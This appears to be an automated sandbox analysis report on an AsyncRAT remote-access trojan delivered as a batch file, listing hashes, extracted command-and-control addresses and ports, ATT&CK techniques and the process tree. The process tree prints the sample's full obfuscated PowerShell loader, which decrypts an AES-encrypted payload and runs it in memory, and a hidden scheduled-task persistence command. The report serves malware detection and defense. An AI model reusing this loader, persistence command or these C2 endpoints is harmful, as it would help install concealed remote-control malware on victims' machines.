asyncrat | d548ff4b3087f7bcf7a83019bef434fe23baef7489c3b92dac45b1ce3e542e5b

Analysis

max time kernel
138s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
14/05/2024, 08:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

getrnr.bat
Size

279KB
MD5

167bee7350388d8357a2c7b7a67275de
SHA1

15ad2fbb16264b7f595e600ae4319256b8c83153
SHA256

d548ff4b3087f7bcf7a83019bef434fe23baef7489c3b92dac45b1ce3e542e5b
SHA512

3ece3f5a0bf43264cc31f27ecee046f6093e61064683f5d1b3d6d62ec2c7f8ee7a9452869aeb7c636c02b98cf64852797a1581b6f50b7cb04f3e778242c7cf54
SSDEEP

6144:ADe50b7Ynod1bLuUJV5q5oG+2mYKPvlxL32nAel/W:ADe+ftLuo2m1PNvy/W

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

51.195.229.88:6606

51.195.229.88:7707

51.195.229.88:8808

Mutex

RtcMBJiBo8Ns

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/memory/4600-81-0x00000294F4FE0000-0x00000294F4FF2000-memory.dmp	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1604	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	getrnr.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 2 IoCs

pid	Process
1268	getrnr.bat.exe
4600	startup_str_952.bat.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings	getrnr.bat.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1268	getrnr.bat.exe
1268	getrnr.bat.exe
4592	powershell.exe
4592	powershell.exe
1604	powershell.exe
1604	powershell.exe
4600	startup_str_952.bat.exe
4600	startup_str_952.bat.exe
1220	powershell.exe
1220	powershell.exe
1220	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1268	getrnr.bat.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeIncreaseQuotaPrivilege	4592	powershell.exe
Token: SeSecurityPrivilege	4592	powershell.exe
Token: SeTakeOwnershipPrivilege	4592	powershell.exe
Token: SeLoadDriverPrivilege	4592	powershell.exe
Token: SeSystemProfilePrivilege	4592	powershell.exe
Token: SeSystemtimePrivilege	4592	powershell.exe
Token: SeProfSingleProcessPrivilege	4592	powershell.exe
Token: SeIncBasePriorityPrivilege	4592	powershell.exe
Token: SeCreatePagefilePrivilege	4592	powershell.exe
Token: SeBackupPrivilege	4592	powershell.exe
Token: SeRestorePrivilege	4592	powershell.exe
Token: SeShutdownPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeSystemEnvironmentPrivilege	4592	powershell.exe
Token: SeRemoteShutdownPrivilege	4592	powershell.exe
Token: SeUndockPrivilege	4592	powershell.exe
Token: SeManageVolumePrivilege	4592	powershell.exe
Token: 33	4592	powershell.exe
Token: 34	4592	powershell.exe
Token: 35	4592	powershell.exe
Token: 36	4592	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeIncreaseQuotaPrivilege	1604	powershell.exe
Token: SeSecurityPrivilege	1604	powershell.exe
Token: SeTakeOwnershipPrivilege	1604	powershell.exe
Token: SeLoadDriverPrivilege	1604	powershell.exe
Token: SeSystemProfilePrivilege	1604	powershell.exe
Token: SeSystemtimePrivilege	1604	powershell.exe
Token: SeProfSingleProcessPrivilege	1604	powershell.exe
Token: SeIncBasePriorityPrivilege	1604	powershell.exe
Token: SeCreatePagefilePrivilege	1604	powershell.exe
Token: SeBackupPrivilege	1604	powershell.exe
Token: SeRestorePrivilege	1604	powershell.exe
Token: SeShutdownPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeSystemEnvironmentPrivilege	1604	powershell.exe
Token: SeRemoteShutdownPrivilege	1604	powershell.exe
Token: SeUndockPrivilege	1604	powershell.exe
Token: SeManageVolumePrivilege	1604	powershell.exe
Token: 33	1604	powershell.exe
Token: 34	1604	powershell.exe
Token: 35	1604	powershell.exe
Token: 36	1604	powershell.exe
Token: SeIncreaseQuotaPrivilege	1604	powershell.exe
Token: SeSecurityPrivilege	1604	powershell.exe
Token: SeTakeOwnershipPrivilege	1604	powershell.exe
Token: SeLoadDriverPrivilege	1604	powershell.exe
Token: SeSystemProfilePrivilege	1604	powershell.exe
Token: SeSystemtimePrivilege	1604	powershell.exe
Token: SeProfSingleProcessPrivilege	1604	powershell.exe
Token: SeIncBasePriorityPrivilege	1604	powershell.exe
Token: SeCreatePagefilePrivilege	1604	powershell.exe
Token: SeBackupPrivilege	1604	powershell.exe
Token: SeRestorePrivilege	1604	powershell.exe
Token: SeShutdownPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeSystemEnvironmentPrivilege	1604	powershell.exe
Token: SeRemoteShutdownPrivilege	1604	powershell.exe
Token: SeUndockPrivilege	1604	powershell.exe
Token: SeManageVolumePrivilege	1604	powershell.exe
Token: 33	1604	powershell.exe
Token: 34	1604	powershell.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 4836 wrote to memory of 1268	4836	cmd.exe	84
PID 4836 wrote to memory of 1268	4836	cmd.exe	84
PID 1268 wrote to memory of 4592	1268	getrnr.bat.exe	86
PID 1268 wrote to memory of 4592	1268	getrnr.bat.exe	86
PID 1268 wrote to memory of 1604	1268	getrnr.bat.exe	89
PID 1268 wrote to memory of 1604	1268	getrnr.bat.exe	89
PID 1268 wrote to memory of 4308	1268	getrnr.bat.exe	93
PID 1268 wrote to memory of 4308	1268	getrnr.bat.exe	93
PID 4308 wrote to memory of 2928	4308	WScript.exe	94
PID 4308 wrote to memory of 2928	4308	WScript.exe	94
PID 2928 wrote to memory of 4600	2928	cmd.exe	96
PID 2928 wrote to memory of 4600	2928	cmd.exe	96
PID 4600 wrote to memory of 1220	4600	startup_str_952.bat.exe	98
PID 4600 wrote to memory of 1220	4600	startup_str_952.bat.exe	98

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\getrnr.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4836
- C:\Users\Admin\AppData\Local\Temp\getrnr.bat.exe
  "getrnr.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_JiNoS = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\getrnr.bat').Split([Environment]::NewLine);foreach ($_CASH_Xcoxe in $_CASH_JiNoS) { if ($_CASH_Xcoxe.StartsWith(':: @')) { $_CASH_rknXM = $_CASH_Xcoxe.Substring(4); break; }; };$_CASH_rknXM = [System.Text.RegularExpressions.Regex]::Replace($_CASH_rknXM, '_CASH_', '');$_CASH_DIvnK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_rknXM);$_CASH_CznMv = New-Object System.Security.Cryptography.AesManaged;$_CASH_CznMv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_CznMv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_CznMv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zEFw90YEtbw7ZpTxvvNz6EhXoNPmBL+mwZ3UVM6DVaM=');$_CASH_CznMv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ozT1pR8RbqxqWOY1oBL98w==');$_CASH_bMTfl = $_CASH_CznMv.CreateDecryptor();$_CASH_DIvnK = $_CASH_bMTfl.TransformFinalBlock($_CASH_DIvnK, 0, $_CASH_DIvnK.Length);$_CASH_bMTfl.Dispose();$_CASH_CznMv.Dispose();$_CASH_TDSoU = New-Object System.IO.MemoryStream(, $_CASH_DIvnK);$_CASH_NcZjV = New-Object System.IO.MemoryStream;$_CASH_sJaCx = New-Object System.IO.Compression.GZipStream($_CASH_TDSoU, [IO.Compression.CompressionMode]::Decompress);$_CASH_sJaCx.CopyTo($_CASH_NcZjV);$_CASH_sJaCx.Dispose();$_CASH_TDSoU.Dispose();$_CASH_NcZjV.Dispose();$_CASH_DIvnK = $_CASH_NcZjV.ToArray();$_CASH_cXtdN = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DIvnK);$_CASH_dJxRg = $_CASH_cXtdN.EntryPoint;$_CASH_dJxRg.Invoke($null, (, [string[]] ('')))
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\getrnr')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_952_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_952.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_952.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4308
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_952.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2928
    - - C:\Users\Admin\AppData\Roaming\startup_str_952.bat.exe
        
        "startup_str_952.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_JiNoS = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_952.bat').Split([Environment]::NewLine);foreach ($_CASH_Xcoxe in $_CASH_JiNoS) { if ($_CASH_Xcoxe.StartsWith(':: @')) { $_CASH_rknXM = $_CASH_Xcoxe.Substring(4); break; }; };$_CASH_rknXM = [System.Text.RegularExpressions.Regex]::Replace($_CASH_rknXM, '_CASH_', '');$_CASH_DIvnK = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_rknXM);$_CASH_CznMv = New-Object System.Security.Cryptography.AesManaged;$_CASH_CznMv.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_CznMv.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_CznMv.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zEFw90YEtbw7ZpTxvvNz6EhXoNPmBL+mwZ3UVM6DVaM=');$_CASH_CznMv.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ozT1pR8RbqxqWOY1oBL98w==');$_CASH_bMTfl = $_CASH_CznMv.CreateDecryptor();$_CASH_DIvnK = $_CASH_bMTfl.TransformFinalBlock($_CASH_DIvnK, 0, $_CASH_DIvnK.Length);$_CASH_bMTfl.Dispose();$_CASH_CznMv.Dispose();$_CASH_TDSoU = New-Object System.IO.MemoryStream(, $_CASH_DIvnK);$_CASH_NcZjV = New-Object System.IO.MemoryStream;$_CASH_sJaCx = New-Object System.IO.Compression.GZipStream($_CASH_TDSoU, [IO.Compression.CompressionMode]::Decompress);$_CASH_sJaCx.CopyTo($_CASH_NcZjV);$_CASH_sJaCx.Dispose();$_CASH_TDSoU.Dispose();$_CASH_NcZjV.Dispose();$_CASH_DIvnK = $_CASH_NcZjV.ToArray();$_CASH_cXtdN = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DIvnK);$_CASH_dJxRg = $_CASH_cXtdN.EntryPoint;$_CASH_dJxRg.Invoke($null, (, [string[]] ('')))
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4600
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_952')
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1220

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4d9989398fefa433eceb8414b3b2b351

SHA1
8612324e3c5a5a0cdc799c3a8f6b604668ce8c71

SHA256
e79ab62d12af883699da21d2c5518be9d5ce122b698ac433eb53232379a12502

SHA512
6df6a6bd48d402511c8de4b734e9f41bbe5eb5a34f9d12bf539e286bf55edb10bb85f8d604568c6d6713e8231d2f54d7b068fbbc3d9979c5dc213ab53e5c1705

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
75b4b2eecda41cec059c973abb1114c0

SHA1
11dadf4817ead21b0340ce529ee9bbd7f0422668

SHA256
5540f4ea6d18b1aa94a3349652133a4f6641d456757499b7ab12e7ee8f396134

SHA512
87feaf17bd331ed6afd9079fefb1d8f5d3911ababf8ea7542be16c946301a7172a5dc46d249b2192376957468d75bf1c99752529ca77ec0aa78a8d054b3a6626

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cq4553ns.bwo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\getrnr.bat.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_952.bat

Filesize
279KB

MD5
167bee7350388d8357a2c7b7a67275de

SHA1
15ad2fbb16264b7f595e600ae4319256b8c83153

SHA256
d548ff4b3087f7bcf7a83019bef434fe23baef7489c3b92dac45b1ce3e542e5b

SHA512
3ece3f5a0bf43264cc31f27ecee046f6093e61064683f5d1b3d6d62ec2c7f8ee7a9452869aeb7c636c02b98cf64852797a1581b6f50b7cb04f3e778242c7cf54

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_952.vbs

Filesize
115B

MD5
217fb4da41f4415a6d40fb943890dbd9

SHA1
5396c9a8eaf233e6d60cd9f41b92f06582388a13

SHA256
00363bf957e449ffc63b05fadf8bd3636983a558b44d3e8a9a7074fcc779e3c7

SHA512
34f862a30f7049ffcdec97c829f696fa4b48f8182ccde7f3597c5c82fa88842bd9d24e1d64e218d5fa6bd0716154b40a147145c335d342078d19cb32c0cba1b5

Download Submit
memory/1268-15-0x00007FFAE9190000-0x00007FFAE9C51000-memory.dmp

Filesize
10.8MB

Download
memory/1268-17-0x000001A1435A0000-0x000001A1437F0000-memory.dmp

Filesize
2.3MB

Download
memory/1268-16-0x00007FFAE9190000-0x00007FFAE9C51000-memory.dmp

Filesize
10.8MB

Download
memory/1268-14-0x000001A143270000-0x000001A143292000-memory.dmp

Filesize
136KB

Download
memory/1268-4-0x00007FFAE9193000-0x00007FFAE9195000-memory.dmp

Filesize
8KB

Download
memory/1268-82-0x00007FFAE9190000-0x00007FFAE9C51000-memory.dmp

Filesize
10.8MB

Download
memory/4592-29-0x00007FFAE9190000-0x00007FFAE9C51000-memory.dmp

Filesize
10.8MB

Download
memory/4592-30-0x00007FFAE9190000-0x00007FFAE9C51000-memory.dmp

Filesize
10.8MB

Download
memory/4592-33-0x00007FFAE9190000-0x00007FFAE9C51000-memory.dmp

Filesize
10.8MB

Download
memory/4592-34-0x00007FFAE9190000-0x00007FFAE9C51000-memory.dmp

Filesize
10.8MB

Download
memory/4592-19-0x00007FFAE9190000-0x00007FFAE9C51000-memory.dmp

Filesize
10.8MB

Download
memory/4600-81-0x00000294F4FE0000-0x00000294F4FF2000-memory.dmp

Filesize
72KB

Download